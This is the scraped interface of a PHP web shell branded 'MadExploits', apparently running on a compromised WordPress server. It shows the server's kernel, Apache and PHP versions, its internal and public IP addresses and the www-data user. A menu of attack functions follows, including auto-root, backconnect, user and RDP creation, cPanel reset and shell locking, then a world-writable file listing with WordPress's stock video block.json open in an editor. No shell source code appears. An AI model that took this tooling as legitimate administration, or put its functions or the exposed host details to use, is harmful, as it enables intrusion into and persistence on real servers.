Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 18.224.73.107
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
wp-includes /
blocks /
video /
[ HOME SHELL ]
Name
Size
Permission
Action
block.json
1.77
KB
-rwxrwxrwx
editor-rtl.css
1.96
KB
-rwxrwxrwx
editor-rtl.min.css
1.8
KB
-rwxrwxrwx
editor.css
1.96
KB
-rwxrwxrwx
editor.min.css
1.8
KB
-rwxrwxrwx
style-rtl.css
317
B
-rwxrwxrwx
style-rtl.min.css
269
B
-rwxrwxrwx
style.css
317
B
-rwxrwxrwx
style.min.css
269
B
-rwxrwxrwx
theme-rtl.css
194
B
-rwxrwxrwx
theme-rtl.min.css
170
B
-rwxrwxrwx
theme.css
194
B
-rwxrwxrwx
theme.min.css
170
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 2, "name": "core/video", "title": "Video", "category": "media", "description": "Embed a video from your media library or upload a new one.", "keywords": [ "movie" ], "textdomain": "default", "attributes": { "autoplay": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "autoplay" }, "caption": { "type": "string", "source": "html", "selector": "figcaption", "__experimentalRole": "content" }, "controls": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "controls", "default": true }, "id": { "type": "number", "__experimentalRole": "content" }, "loop": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "loop" }, "muted": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "muted" }, "poster": { "type": "string", "source": "attribute", "selector": "video", "attribute": "poster" }, "preload": { "type": "string", "source": "attribute", "selector": "video", "attribute": "preload", "default": "metadata" }, "src": { "type": "string", "source": "attribute", "selector": "video", "attribute": "src", "__experimentalRole": "content" }, "playsInline": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "playsinline" }, "tracks": { "__experimentalRole": "content", "type": "array", "items": { "type": "object" }, "default": [] } }, "supports": { "anchor": true, "align": true, "spacing": { "margin": true, "padding": true } }, "editorStyle": "wp-block-video-editor", "style": "wp-block-video" }
Close